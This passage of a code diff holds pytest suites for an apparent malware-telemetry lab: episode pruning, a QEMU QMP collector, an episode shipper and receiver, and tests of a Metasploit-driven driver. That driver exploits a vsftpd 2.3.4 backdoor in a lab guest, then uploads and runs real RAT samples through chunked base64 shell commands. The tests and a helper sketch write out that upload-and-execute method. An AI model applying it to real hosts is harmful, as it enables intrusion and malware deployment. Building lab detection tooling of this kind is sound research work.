+    episodes, index = _stage_receiver_tree(tmp_path)
+    rc = pe.main([
+        "--episodes-root", str(episodes),
+        "--index", str(index),
+        "--reason", "no-sample",
+    ])
+    # Returns 1 because flagged episodes exist (matches CLI exit semantics).
+    assert rc == 1
+    # Both tarballs still on disk.
+    assert (episodes / "lab1" / "01OK.tar.zst").exists()
+    assert (episodes / "lab1" / "01FAKE.tar.zst").exists()
+    # Index unchanged.
+    assert len(index.read_text().splitlines()) == 2
+
+
+def test_archive_moves_flagged_and_rewrites_index(tmp_path: Path) -> None:
+    episodes, index = _stage_receiver_tree(tmp_path)
+    archive = tmp_path / "archive"
+    rc = pe.main([
+        "--episodes-root", str(episodes),
+        "--index", str(index),
+        "--archive-root", str(archive),
+        "--reason", "no-sample",
+        "--archive",
+    ])
+    assert rc == 1
+    # 01OK kept.
+    assert (episodes / "lab1" / "01OK.tar.zst").exists()
+    # 01FAKE moved.
+    assert not (episodes / "lab1" / "01FAKE.tar.zst").exists()
+    assert (archive / "lab1" / "01FAKE.tar.zst").exists()
+    # Index dropped the bad row.
+    rows = [json.loads(l) for l in index.read_text().splitlines() if l.strip()]
+    assert len(rows) == 1
+    assert rows[0]["episode_id"] == "01OK"
+
+
+def test_delete_removes_flagged_and_rewrites_index(tmp_path: Path) -> None:
+    episodes, index = _stage_receiver_tree(tmp_path)
+    rc = pe.main([
+        "--episodes-root", str(episodes),
+        "--index", str(index),
+        "--reason", "no-sample",
+        "--delete",
+    ])
+    assert rc == 1
+    assert not (episodes / "lab1" / "01FAKE.tar.zst").exists()
+    rows = [json.loads(l) for l in index.read_text().splitlines() if l.strip()]
+    assert len(rows) == 1
+
+
+def test_host_filter_scopes_to_one_lab_host(tmp_path: Path) -> None:
+    episodes, index = _stage_receiver_tree(tmp_path)
+    rc = pe.main([
+        "--episodes-root", str(episodes),
+        "--index", str(index),
+        "--reason", "no-sample",
+        "--host", "lab2",  # nothing matches
+    ])
+    assert rc == 0  # zero flagged → exit 0
+    assert (episodes / "lab1" / "01FAKE.tar.zst").exists()
+
+
+def test_multiple_reasons_combine(tmp_path: Path) -> None:
+    """An episode failing >1 signal is flagged once, all reasons listed."""
+    tar = _make_episode(
+        tmp_path,
+        **{"01TEST/meta.json": _meta(sample=None),
+           "01TEST/events.jsonl": _events([{"event": "snapshot_load"}])},
+    )
+    q = pe.classify_episode(tar, host_id="x", episode_id="01TEST")
+    assert "no-sample" in q.reasons
+    assert "no-workload-events" in q.reasons
+    assert q.fake
--- a/tests/test_qmp.py
+++ b/tests/test_qmp.py
@@ -0,0 +1,333 @@
+"""Tests for the QMP collector against an in-process fake QMP server.
+
+The fake speaks just enough QMP to exercise:
+  - the greeting + qmp_capabilities handshake
+  - query-status
+  - query-blockstats
+  - query-stats target=vm
+  - error responses
+  - async events interleaved with command responses
+"""
+
+from __future__ import annotations
+
+import json
+import socket
+import tempfile
+import threading
+import time
+from pathlib import Path
+from typing import Any
+
+import pytest
+
+from collectors import qmp
+
+
+# ---------------------------------------------------------------------------
+# Fake QMP server
+# ---------------------------------------------------------------------------
+
+
+class FakeQMPServer(threading.Thread):
+    """Single-connection fake. Each line received from the client is
+    parsed as JSON; we look up ``execute`` in ``responses`` and emit
+    the configured reply. Optionally interleaves an async event before
+    the response."""
+
+    def __init__(
+        self,
+        socket_path: Path,
+        *,
+        responses: dict[str, Any] | None = None,
+        emit_event_before: set[str] | None = None,
+    ) -> None:
+        super().__init__(daemon=True)
+        self.socket_path = socket_path
+        self.responses = responses or {}
+        self.emit_event_before = emit_event_before or set()
+        self.received: list[dict] = []
+        self._stop_event = threading.Event()  # not "_stop": that name shadows a private Thread method on some CPython versions
+        self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
+        self._sock.bind(str(socket_path))
+        self._sock.listen(1)
+        self._sock.settimeout(5.0)
+
+    def run(self) -> None:
+        try:
+            conn, _ = self._sock.accept()
+        except socket.timeout:
+            return
+        conn.settimeout(5.0)
+        try:
+            # Greeting
+            conn.sendall(b'{"QMP": {"version": {"qemu": {"major":9,"minor":0,"micro":0}}, "capabilities": []}}\n')
+            buf = b""
+            while not self._stop_event.is_set():
+                try:
+                    chunk = conn.recv(4096)
+                except socket.timeout:
+                    if self._stop_event.is_set():
+                        return
+                    continue
+                if not chunk:
+                    return
+                buf += chunk
+                while b"\n" in buf:
+                    line, _, buf = buf.partition(b"\n")
+                    if not line.strip():
+                        continue
+                    msg = json.loads(line)
+                    self.received.append(msg)
+                    cmd = msg.get("execute")
+                    if cmd == "qmp_capabilities":
+                        conn.sendall(b'{"return": {}}\n')
+                        continue
+                    if cmd in self.emit_event_before:
+                        conn.sendall(b'{"event": "STOP", "timestamp": {"seconds": 1, "microseconds": 0}}\n')
+                    if cmd in self.responses:
+                        resp = self.responses[cmd]
+                        conn.sendall((json.dumps(resp) + "\n").encode())
+                    else:
+                        conn.sendall(b'{"error": {"class": "CommandNotFound", "desc": "unknown"}}\n')
+        finally:
+            conn.close()
+
+    def shutdown(self) -> None:
+        self._stop_event.set()
+        try:
+            self._sock.close()
+        except OSError:
+            pass
+
+
+@pytest.fixture
+def qmp_server(tmp_path: Path):
+    sock_path = tmp_path / "qmp.sock"
+    return sock_path
+
+
+# ---------------------------------------------------------------------------
+# Client tests
+# ---------------------------------------------------------------------------
+
+
+def test_connect_negotiates_capabilities(qmp_server: Path) -> None:
+    server = FakeQMPServer(qmp_server)
+    server.start()
+    try:
+        client = qmp.QMPClient(qmp_server)
+        greeting = client.connect()
+        assert "version" in greeting
+    finally:
+        client.close()
+        server.shutdown()
+    # Server saw the qmp_capabilities handshake.
+    assert any(m.get("execute") == "qmp_capabilities" for m in server.received)
+
+
+def test_execute_returns_payload(qmp_server: Path) -> None:
+    server = FakeQMPServer(
+        qmp_server,
+        responses={
+            "query-status": {"return": {"status": "running", "running": True}},
+        },
+    )
+    server.start()
+    try:
+        client = qmp.QMPClient(qmp_server)
+        client.connect()
+        out = client.execute("query-status")
+        assert out == {"status": "running", "running": True}
+    finally:
+        client.close()
+        server.shutdown()
+
+
+def test_execute_skips_async_events_before_response(qmp_server: Path) -> None:
+    server = FakeQMPServer(
+        qmp_server,
+        responses={
+            "query-status": {"return": {"status": "running", "running": True}},
+        },
+        emit_event_before={"query-status"},
+    )
+    server.start()
+    try:
+        client = qmp.QMPClient(qmp_server)
+        client.connect()
+        out = client.execute("query-status")
+        assert out["running"] is True
+    finally:
+        client.close()
+        server.shutdown()
+
+
+def test_execute_raises_on_qmp_error(qmp_server: Path) -> None:
+    server = FakeQMPServer(qmp_server)  # no responses → server sends error
+    server.start()
+    try:
+        client = qmp.QMPClient(qmp_server)
+        client.connect()
+        with pytest.raises(qmp.QMPError):
+            client.execute("totally-fake-command")
+    finally:
+        client.close()
+        server.shutdown()
+
+
+# ---------------------------------------------------------------------------
+# Row builder tests
+# ---------------------------------------------------------------------------
+
+
+def test_collect_once_assembles_full_row(qmp_server: Path) -> None:
+    server = FakeQMPServer(
+        qmp_server,
+        responses={
+            "query-status": {"return": {"status": "running", "running": True}},
+            "query-blockstats": {"return": [{
+                "device": "virtio0",
+                "stats": {
+                    "rd_operations": 12, "wr_operations": 4,
+                    "rd_bytes": 49152, "wr_bytes": 16384,
+                    "flush_operations": 1,
+                },
+            }]},
+            "query-stats": {"return": [{"stats": [
+                {"name": "halt_exits", "value": 17000},
+                {"name": "io_exits",   "value": 942},
+                {"name": "string-skipped", "value": "not-an-int"},
+            ]}]},
+        },
+    )
+    server.start()
+    try:
+        client = qmp.QMPClient(qmp_server)
+        client.connect()
+        row = qmp.collect_once(client, t_mono_origin_ns=time.monotonic_ns())
+    finally:
+        client.close()
+        server.shutdown()
+
+    assert row["source"] == "host_qmp"
+    assert row["available_in_deployment"] is False
+    assert row["vm_running"] is True
+    assert row["blockstats"]["virtio0"]["rd_bytes"] == 49152
+    assert row["blockstats"]["virtio0"]["flush_ops"] == 1
+    assert row["kvm_stats"]["halt_exits"] == 17000
+    assert "string-skipped" not in row["kvm_stats"]
+
+
+def test_collect_once_tolerates_missing_query_stats(qmp_server: Path) -> None:
+    server = FakeQMPServer(
+        qmp_server,
+        responses={
+            "query-status": {"return": {"status": "running", "running": True}},
+            "query-blockstats": {"return": []},
+            # query-stats deliberately absent → server returns CommandNotFound
+        },
+    )
+    server.start()
+    try:
+        client = qmp.QMPClient(qmp_server)
+        client.connect()
+        row = qmp.collect_once(client, t_mono_origin_ns=time.monotonic_ns())
+    finally:
+        client.close()
+        server.shutdown()
+
+    # Older QEMU without query-stats: row still exists, kvm_stats absent.
+    assert "kvm_stats" not in row
+    assert row["vm_running"] is True
+    assert row["blockstats"] == {}
+
+
+# ---------------------------------------------------------------------------
+# run_loop tests
+# ---------------------------------------------------------------------------
+
+
+def test_run_loop_writes_rows_and_stops_cleanly(qmp_server: Path, tmp_path: Path) -> None:
+    server = FakeQMPServer(
+        qmp_server,
+        responses={
+            "query-status": {"return": {"status": "running", "running": True}},
+            "query-blockstats": {"return": []},
+            "query-stats": {"error": {"class": "CommandNotFound", "desc": "n/a"}},
+        },
+    )
+    server.start()
+    out_path = tmp_path / "telemetry-qmp.jsonl"
+    stop = threading.Event()
+
+    def stop_after(ms: int) -> None:
+        time.sleep(ms / 1000.0)
+        stop.set()
+
+    threading.Thread(target=stop_after, args=(350,), daemon=True).start()
+    rows = qmp.run_loop(
+        socket_path=qmp_server,
+        output_path=out_path,
+        t_mono_origin_ns=time.monotonic_ns(),
+        interval_ms=100,
+        stop_event=stop,
+    )
+    server.shutdown()
+
+    assert rows >= 2, f"expected >=2 rows, got {rows}"
+    lines = [json.loads(line) for line in out_path.read_text().splitlines()]
+    assert len(lines) == rows
+    for r in lines:
+        assert r["source"] == "host_qmp"
+        assert r["vm_running"] is True
+
+
+def test_savevm_and_loadvm_via_human_monitor(qmp_server: Path) -> None:
+    server = FakeQMPServer(
+        qmp_server,
+        responses={
+            "human-monitor-command": {"return": ""},
+        },
+    )
+    server.start()
+    try:
+        client = qmp.QMPClient(qmp_server)
+        client.connect()
+        out_save = client.savevm("baseline")
+        out_load = client.loadvm("baseline")
+        assert out_save == ""
+        assert out_load == ""
+    finally:
+        client.close()
+        server.shutdown()
+    # Both calls go out as human-monitor-command with the right cmdline.
+    hmcs = [m for m in server.received if m.get("execute") == "human-monitor-command"]
+    cmds = [m["arguments"]["command-line"] for m in hmcs]
+    assert "savevm baseline" in cmds
+    assert "loadvm baseline" in cmds
+
+
+def test_loadvm_surfaces_error(qmp_server: Path) -> None:
+    server = FakeQMPServer(qmp_server)  # no responses → error reply
+    server.start()
+    try:
+        client = qmp.QMPClient(qmp_server)
+        client.connect()
+        with pytest.raises(qmp.QMPError):
+            client.loadvm("does-not-exist")
+    finally:
+        client.close()
+        server.shutdown()
+
+
+def test_run_loop_returns_zero_when_socket_missing(tmp_path: Path) -> None:
+    # No server bound to the socket path.
+    rows = qmp.run_loop(
+        socket_path=tmp_path / "nonexistent.sock",
+        output_path=tmp_path / "telemetry-qmp.jsonl",
+        t_mono_origin_ns=time.monotonic_ns(),
+        interval_ms=100,
+        stop_event=threading.Event(),
+    )
+    assert rows == 0
--- a/tests/test_shipper.py
+++ b/tests/test_shipper.py
@ -0,0 +1,327 @@
+"""End-to-end shipper tests.
+
+These run a real Uvicorn server bound to 127.0.0.1 on a free port,
+hosting the actual receiver Starlette app over an EpisodeStore on a
+temp dir. The shipper then talks to that server with its real
+`httpx.Client` — same code path as production. This catches things
+the receiver-side ASGI tests can't (HTTP framing, header handling,
+sync httpx behaviour, content-length quirks).
+"""
+
+from __future__ import annotations
+
+import json
+import socket
+import threading
+import time
+from pathlib import Path
+
+import httpx
+import pytest
+import uvicorn
+
+from receiver.app import make_app
+from receiver.store import EpisodeStore
+from shipper.config import ReceiverEndpoint, ShipperConfig
+from shipper.queue import ShipperQueue
+from shipper.transport import ShipperTransport
+
+
+# ---------------------------------------------------------------------------
+# Live-receiver fixture
+# ---------------------------------------------------------------------------
+
+
+def _free_port() -> int:
+    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
+        s.bind(("127.0.0.1", 0))
+        return s.getsockname()[1]
+
+
+class _ServerThread(threading.Thread):
+    def __init__(self, app, port: int) -> None:
+        super().__init__(daemon=True)
+        cfg = uvicorn.Config(
+            app,
+            host="127.0.0.1",
+            port=port,
+            log_level="error",
+            lifespan="off",
+            access_log=False,
+        )
+        self.server = uvicorn.Server(cfg)
+
+    def run(self) -> None:
+        self.server.run()
+
+    def stop(self) -> None:
+        self.server.should_exit = True
+
+
+def _wait_for_port(port: int, timeout_s: float = 5.0) -> None:
+    deadline = time.monotonic() + timeout_s
+    while time.monotonic() < deadline:
+        try:
+            with httpx.Client(timeout=0.5) as c:
+                r = c.get(f"http://127.0.0.1:{port}/v1/health")
+                if r.status_code == 200:
+                    return
+        except httpx.HTTPError:
+            pass
+        time.sleep(0.05)
+    raise TimeoutError(f"receiver on 127.0.0.1:{port} did not come up")
+
+
+@pytest.fixture
+def store(tmp_path: Path) -> EpisodeStore:
+    return EpisodeStore(
+        store_root=tmp_path / "rcv-episodes",
+        incoming_root=tmp_path / "rcv-incoming",
+        index_path=tmp_path / "rcv-index.jsonl",
+    )
+
+
+@pytest.fixture
+def receiver(store: EpisodeStore):
+    app = make_app(store=store, max_episode_bytes=10_000_000, bearer_token=None)
+    port = _free_port()
+    server = _ServerThread(app, port)
+    server.start()
+    try:
+        _wait_for_port(port)
+        yield f"http://127.0.0.1:{port}", store
+    finally:
+        server.stop()
+        server.join(timeout=2)
+
+
+@pytest.fixture
+def receiver_with_bearer(store: EpisodeStore):
+    app = make_app(store=store, max_episode_bytes=10_000_000, bearer_token="s3cret")
+    port = _free_port()
+    server = _ServerThread(app, port)
+    server.start()
+    try:
+        _wait_for_port(port)
+        yield f"http://127.0.0.1:{port}", store
+    finally:
+        server.stop()
+        server.join(timeout=2)
+
+
+def _make_shipper(
+    tmp_path: Path,
+    receiver_url: str,
+    *,
+    host_id: str = "lab1",
+    bearer: str | None = None,
+) -> tuple[ShipperConfig, ShipperTransport, ShipperQueue]:
+    data_root = tmp_path / "lab-data"
+    cfg = ShipperConfig(
+        host_id=host_id,
+        data_root=data_root,
+        receiver=ReceiverEndpoint(url=receiver_url, bearer_token=bearer),
+        scan_interval_s=0.05,
+    )
+    transport = ShipperTransport(cfg)
+    queue = ShipperQueue(cfg, transport)
+    return cfg, transport, queue
+
+
+def _make_episode(cfg: ShipperConfig, episode_id: str, *, content: bytes = b"data") -> Path:
+    ep = cfg.episodes_dir / episode_id
+    ep.mkdir(parents=True, exist_ok=True)
+    (ep / "meta.json").write_bytes(content)
+    (ep / "events.jsonl").write_text("{}\n")
+    (ep / "labels.jsonl").write_text("{}\n")
+    (ep / "telemetry-proc.jsonl").write_text("{}\n")
+    (ep / "done.marker").touch()
+    return ep
+
+
+# ---------------------------------------------------------------------------
+# Ping
+# ---------------------------------------------------------------------------
+
+
+def test_ping_returns_ok_against_running_receiver(tmp_path: Path, receiver) -> None:
+    url, _ = receiver
+    _, transport, _ = _make_shipper(tmp_path, url)
+    res = transport.ping()
+    assert res.ok is True
+    assert res.status_code == 200
+    assert res.body is not None
+    assert res.body["ok"] is True
+    assert res.body["host_id"] == "lab1"
+    assert res.body["schema_version"] == 1
+
+
+def test_ping_writes_nothing_to_index(tmp_path: Path, receiver) -> None:
+    url, store = receiver
+    _, transport, _ = _make_shipper(tmp_path, url)
+    transport.ping()
+    transport.ping()
+    transport.ping()
+    assert store.index_path.read_text() == ""
+
+
+def test_ping_fails_with_wrong_bearer(tmp_path: Path, receiver_with_bearer) -> None:
+    url, _ = receiver_with_bearer
+    _, transport, _ = _make_shipper(tmp_path, url, bearer="WRONG")
+    res = transport.ping()
+    assert res.ok is False
+    assert res.status_code == 401
+
+
+def test_ping_succeeds_with_right_bearer(tmp_path: Path, receiver_with_bearer) -> None:
+    url, _ = receiver_with_bearer
+    _, transport, _ = _make_shipper(tmp_path, url, bearer="s3cret")
+    res = transport.ping()
+    assert res.ok is True
+    assert res.status_code == 200
+
+
+def test_ping_fails_when_receiver_unreachable(tmp_path: Path) -> None:
+    # Pick a free port and don't bind it — connect must fail.
+    port = _free_port()
+    _, transport, _ = _make_shipper(tmp_path, f"http://127.0.0.1:{port}")
+    res = transport.ping()
+    assert res.ok is False
+    assert res.status_code == 0
+    assert res.error is not None
+
+
+# ---------------------------------------------------------------------------
+# Tar + ship
+# ---------------------------------------------------------------------------
+
+
+def test_run_once_ships_one_done_episode(tmp_path: Path, receiver) -> None:
+    url, store = receiver
+    cfg, _, queue = _make_shipper(tmp_path, url)
+    _make_episode(cfg, "01EPISODE")
+
+    result = queue.run_once()
+    assert result.scanned == 1
+    assert result.shipped == 1
+    assert result.transient_failures == 0
+
+    # Episode dir moved to shipped/.
+    assert not (cfg.episodes_dir / "01EPISODE").exists()
+    assert (cfg.shipped_dir / "01EPISODE").exists()
+
+    # Outbox tarball cleaned up.
+    assert list(cfg.outbox_dir.iterdir()) == []
+
+    # Receiver stored it and indexed it.
+    assert store.final_path("lab1", "01EPISODE").exists()
+    rows = [json.loads(line) for line in store.index_path.read_text().splitlines()]
+    assert len(rows) == 1
+    assert rows[0]["host_id"] == "lab1"
+    assert rows[0]["episode_id"] == "01EPISODE"
+
+
+def test_run_once_skips_episodes_without_done_marker(tmp_path: Path, receiver) -> None:
+    url, store = receiver
+    cfg, _, queue = _make_shipper(tmp_path, url)
+    ep = cfg.episodes_dir / "01PARTIAL"
+    ep.mkdir(parents=True)
+    (ep / "meta.json").write_text("{}")
+    # Note: NO done.marker.
+
+    result = queue.run_once()
+    assert result.scanned == 0
+    assert result.shipped == 0
+    assert ep.exists()  # untouched
+    assert store.index_path.read_text() == ""
+
+
+def test_run_once_idempotent_re_ship_returns_already_present(tmp_path: Path, receiver) -> None:
+    """If a prior run shipped an episode but crashed before retiring it,
+    the next run must re-ship the same bytes successfully (200) and
+    retire the dir, not flag it as a conflict."""
+    url, store = receiver
+    cfg, _, queue = _make_shipper(tmp_path, url)
+    _make_episode(cfg, "01REPLAY", content=b"same-bytes")
+
+    queue.run_once()
+    assert (cfg.shipped_dir / "01REPLAY").exists()
+
+    # Simulate a crash: move it back as if retire never happened.
+    (cfg.shipped_dir / "01REPLAY").rename(cfg.episodes_dir / "01REPLAY")
+
+    result = queue.run_once()
+    assert result.scanned == 1
+    assert result.shipped == 1
+    assert (cfg.shipped_dir / "01REPLAY").exists()
+
+    # Index didn't double up.
+    rows = store.index_path.read_text().splitlines()
+    assert len(rows) == 1
+
+
+def test_run_once_handles_409_conflict(tmp_path: Path, receiver) -> None:
+    """If the same episode_id was previously shipped with *different*
+    bytes, the receiver returns 409 and the shipper must NOT retire
+    the local dir — operator triage required."""
+    url, _ = receiver
+    cfg, _, queue = _make_shipper(tmp_path, url)
+    _make_episode(cfg, "01CONFLICT", content=b"first")
+
+    result = queue.run_once()
+    assert result.shipped == 1
+
+    # Simulate a re-do with different content but the same id (e.g., a
+    # botched re-run on the lab host).
+    (cfg.shipped_dir / "01CONFLICT").rename(cfg.episodes_dir / "01CONFLICT")
+    (cfg.episodes_dir / "01CONFLICT" / "meta.json").write_bytes(b"tampered")
+
+    result = queue.run_once()
+    assert result.scanned == 1
+    assert result.shipped == 0
+    assert result.conflicts == 1
+    # Local dir survives — operator can decide what to do.
+    assert (cfg.episodes_dir / "01CONFLICT").exists()
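+
+
+# Illustrative sketch only: one way a receiver could tell an idempotent
+# re-ship from a conflict, as the two tests above expect. The function name,
+# the digest-comparison approach and the string labels are assumptions for
+# this example, not the receiver's actual implementation.
+def _sketch_classify_upload(stored_sha256: str | None, incoming_sha256: str) -> str:
+    if stored_sha256 is None:
+        return "store"            # first time this episode_id is seen
+    if stored_sha256 == incoming_sha256:
+        return "already_present"  # same bytes again: succeed, do not re-index
+    return "conflict"             # same id, different bytes: reply 409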
+
+
+def test_run_once_handles_transient_when_receiver_is_down(tmp_path: Path) -> None:
+    port = _free_port()
+    cfg, _, queue = _make_shipper(tmp_path, f"http://127.0.0.1:{port}")
+    _make_episode(cfg, "01DOWN")
+
+    result = queue.run_once()
+    assert result.scanned == 1
+    assert result.shipped == 0
+    assert result.transient_failures == 1
+    # Episode dir + tarball both stay in place for the next pass.
+    assert (cfg.episodes_dir / "01DOWN").exists()
+    assert (cfg.outbox_dir / "01DOWN.tar.zst").exists()
+
+
+def test_tarball_round_trips_episode_dir(tmp_path: Path, receiver) -> None:
+    """The receiver-side tarball must extract back to the original
+    episode dir layout (modulo file order). Verifies the tar+zstd
+    pipe is intact."""
+    import subprocess
+    import tarfile
+
+    url, _ = receiver
+    cfg, _, queue = _make_shipper(tmp_path, url)
+    ep = _make_episode(cfg, "01ROUND", content=b"meta-bytes")
+    expected_files = sorted(p.name for p in ep.iterdir())
+
+    queue.run_once()
+
+    # The receiver stored it; pull the bytes back, decompress + untar.
+    rcv_path = next((tmp_path / "rcv-episodes" / "lab1").glob("01ROUND.tar.zst"))
+    decompressed = tmp_path / "01ROUND.tar"
+    subprocess.check_call(
+        ["zstd", "-q", "-d", "-o", str(decompressed), str(rcv_path)],
+    )
+    extract_dir = tmp_path / "extracted"
+    extract_dir.mkdir()
+    with tarfile.open(decompressed) as tf:
+        tf.extractall(extract_dir)
+
+    got_files = sorted(p.name for p in (extract_dir / "01ROUND").iterdir())
+    assert got_files == expected_files
--- a/tests/test_tier4.py
+++ b/tests/test_tier4.py
@ -0,0 +1,258 @@
+"""Tests for the Tier-4 path:
+  - real_binary_workload constructs valid shell commands
+  - Sample.binary_path resolves correctly
+  - MSFExploitDriver real-sample dispatch picks the upload+exec path
+    when a binary is staged, and the mimic path when it isn't
+  - tools/fetch_sample input validation (we don't hit the live API)
+"""
+
+from __future__ import annotations
+
+import hashlib
+from pathlib import Path
+
+import pytest
+
+from exploits.driver import DriverConfig, MSFExploitDriver
+from exploits.modules import load_module_config
+from exploits.workloads import (
+    chunked_real_binary_upload, real_binary_workload,
+)
+from samples.manifest import Sample
+
+
+REPO_ROOT = Path(__file__).resolve().parent.parent
+MODULES_DIR = REPO_ROOT / "exploits" / "modules"
+
+
+# Reuse the FakeMSFRpcClient from test_exploits.py.
+from tests.test_exploits import FakeMSFRpcClient  # noqa: E402
+
+
+# ---------------------------------------------------------------------------
+# real_binary_workload
+# ---------------------------------------------------------------------------
+
+
+def test_real_binary_workload_embeds_base64() -> None:
+    payload = b"\x7fELF" + b"\x00" * 64  # tiny ELF-shaped header
+    w = real_binary_workload(payload)
+    # Start command bundles a chunked upload (printf '%s' '<b64>' >> file).
+    # Pull all b64 segments out and confirm they round-trip.
+    import base64 as _b64
+    import re
+    matches = re.findall(r"printf '%s' '([A-Za-z0-9+/=]+)'", w.start_cmd)
+    assert matches, "expected printf-based b64 chunks in start_cmd"
+    decoded = _b64.b64decode("".join(matches))
+    assert decoded == payload
+
+
+def test_chunked_real_binary_upload_splits_correctly() -> None:
+    """A binary larger than the chunk size should produce >1 chunks
+    plus a finalize + exec. Each chunk's payload must be individually
+    valid base64 and the concatenation must round-trip."""
+    import base64 as _b64
+    import re
+
+    # Build a payload large enough to force multiple chunks.
+    payload = b"\x90\xab" * 8000
+    plan = chunked_real_binary_upload(payload)
+    assert plan.n_chunks >= 3  # one init chunk plus at least two data chunks
+    # hashlib is already imported at module level; no local alias needed.
+    assert plan.expected_sha256 == hashlib.sha256(payload).hexdigest()
+
+    # Reconstruct from chunks.
+    segs = []
+    for c in plan.chunks:
+        m = re.search(r"printf '%s' '([A-Za-z0-9+/=]+)'", c)
+        if m:
+            segs.append(m.group(1))
+    assert segs, "no data chunks parsed"
+    decoded = _b64.b64decode("".join(segs))
+    assert decoded == payload
+
+    # finalize_cmd verifies the sha256 we computed.
+    assert plan.expected_sha256 in plan.finalize_cmd
+    assert "sha256sum" in plan.finalize_cmd
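+
+
+# Illustrative sketch only: how a chunk plan with the properties asserted
+# above could be built. This is not the exploits.workloads implementation; the
+# function name, the 3000-byte chunk size and the remote path are assumptions.
+# Splitting the raw bytes on a multiple of 3 keeps every chunk's base64 free
+# of padding except the last, so the segments also decode when concatenated.
+def _sketch_chunk_commands(
+    payload: bytes,
+    dest: str = "/tmp/.sketch-bin",
+    chunk_bytes: int = 3000,
+) -> list[str]:
+    import base64 as _b64
+
+    assert chunk_bytes % 3 == 0, "chunk size must be a multiple of 3"
+    cmds = [f": > {dest}.b64"]  # init: truncate the staging file
+    for i in range(0, len(payload), chunk_bytes):
+        seg = _b64.b64encode(payload[i:i + chunk_bytes]).decode("ascii")
+        cmds.append(f"printf '%s' '{seg}' >> {dest}.b64")
+    digest = hashlib.sha256(payload).hexdigest()
+    # Finalize: decode the staged base64, then verify the digest in the guest.
+    cmds.append(
+        f"base64 -d {dest}.b64 > {dest} && "
+        f"echo '{digest}  {dest}' | sha256sum -c -"
+    )
+    return cmds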
+
+
+def test_real_binary_workload_stop_kills_pidfile() -> None:
+    w = real_binary_workload(b"x" * 16)
+    assert "kill" in w.stop_cmd
+    assert ".cis490-real" in w.stop_cmd
+
+
+def test_real_binary_workload_per_profile_isolation() -> None:
+    a = real_binary_workload(b"\x00", sample=Sample(name="a", family="A", category="rat", profile="cpu-saturate"))
+    b = real_binary_workload(b"\x00", sample=Sample(name="b", family="B", category="rat", profile="bursty-c2"))
+    # Different profiles → different /tmp paths so concurrent samples
+    # don't stomp each other in the same guest.
+    assert a.profile != b.profile
+    assert a.start_cmd != b.start_cmd
+
+
+# ---------------------------------------------------------------------------
+# Sample.binary_path
+# ---------------------------------------------------------------------------
+
+
+def test_binary_path_resolves_when_staged(tmp_path: Path) -> None:
+    sha = "a" * 64
+    (tmp_path / sha).write_bytes(b"hello")
+    s = Sample(name="x", family="X", category="rat", profile="cpu-saturate", sha256=sha)
+    assert s.binary_path(tmp_path) == tmp_path / sha
+
+
+def test_binary_path_none_when_missing(tmp_path: Path) -> None:
+    s = Sample(name="x", family="X", category="rat", profile="cpu-saturate", sha256="b" * 64)
+    assert s.binary_path(tmp_path) is None
+
+
+def test_binary_path_none_for_mimic_sample(tmp_path: Path) -> None:
+    s = Sample(name="x", family="X", category="rat", profile="cpu-saturate")
+    assert s.binary_path(tmp_path) is None
+
+
+# ---------------------------------------------------------------------------
+# Driver dispatch
+# ---------------------------------------------------------------------------
+
+
+def test_driver_picks_real_binary_when_staged(tmp_path: Path) -> None:
+    payload = b"\x7fELF\x02" + b"\x00" * 60
+    sha = hashlib.sha256(payload).hexdigest()
+    (tmp_path / sha).write_bytes(payload)
+
+    sample = Sample(
+        name="real-x", family="X", category="rat",
+        profile="cpu-saturate", sha256=sha,
+    )
+    cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
+    client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
+    driver = MSFExploitDriver(
+        client=client,  # type: ignore[arg-type]
+        module=cfg,
+        cfg=DriverConfig(
+            target_ip="10.200.0.10",
+            session_open_timeout_s=0.5,
+            sample_store_root=tmp_path,
+        ),
+        emit_event=lambda *a, **kw: None,
+        sample=sample,
+    )
+    # Driver picks the chunked-upload path.
+    assert driver.workload is not None
+    assert driver.workload.profile.startswith("real:")
+    assert driver._chunked is not None
+    assert driver._chunked.expected_sha256 == sha
+
+
+def test_driver_walks_chunked_upload_in_session(tmp_path: Path) -> None:
+    """End-to-end: at infected_running, the driver should issue every
+    chunk + finalize + exec as separate shell_write calls. The fake
+    client records them in order so we can verify."""
+    payload = b"\xde\xad\xbe\xef" * 4096   # 16 KiB → multiple chunks
+    sha = hashlib.sha256(payload).hexdigest()
+    (tmp_path / sha).write_bytes(payload)
+
+    sample = Sample(
+        name="real-multi", family="X", category="rat",
+        profile="bursty-c2", sha256=sha,
+    )
+    cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
+
+    # Patch the fake to return "sha-ok" so the verify step passes.
+    client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
+    client._verify_response = "sha-ok\n"
+    real_read = client.session_shell_read
+    def shell_read_with_verify(sid):
+        # Return verify token after the finalize command — i.e. once
+        # the most recent shell_write contained "sha256sum".
+        last = client.shell_writes[-1][1] if client.shell_writes else ""
+        if "sha256sum" in last:
+            return "sha-ok\n"
+        return real_read(sid)
+    client.session_shell_read = shell_read_with_verify  # type: ignore[assignment]
+
+    events: list[tuple[str, dict]] = []
+    driver = MSFExploitDriver(
+        client=client,  # type: ignore[arg-type]
+        module=cfg,
+        cfg=DriverConfig(
+            target_ip="10.200.0.10",
+            session_open_timeout_s=0.5,
+            sample_store_root=tmp_path,
+        ),
+        emit_event=lambda ev, **kw: events.append((ev, kw)),
+        sample=sample,
+    )
+    driver.setup()
+    driver.set_phase("armed")
+    driver.set_phase("infecting")
+    driver.set_phase("infected_running")
+
+    # All chunks + finalize + exec went through shell_write.
+    writes = [w for (_, w) in client.shell_writes]
+    n_printf = sum(1 for w in writes if w.startswith("printf '%s'"))
+    n_finalize = sum(1 for w in writes if "sha256sum" in w)
+    n_exec = sum(1 for w in writes if "nohup" in w and ".cis490-real" in w)
+    assert n_printf >= 2, f"expected multiple chunks, saw {n_printf}"
+    assert n_finalize == 1
+    assert n_exec == 1
+
+    # Events tell the same story.
+    names = [e for (e, _) in events]
+    assert "real_binary_upload_begin" in names
+    assert "real_binary_verify" in names
+    assert any(e == "sample_executed" and kw.get("kind") == "real"
+               for (e, kw) in events)
+
+
+def test_driver_falls_back_to_mimic_when_real_binary_missing(tmp_path: Path) -> None:
+    sample = Sample(
+        name="real-but-missing", family="X", category="rat",
+        profile="bursty-c2", sha256="c" * 64,
+    )
+    cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
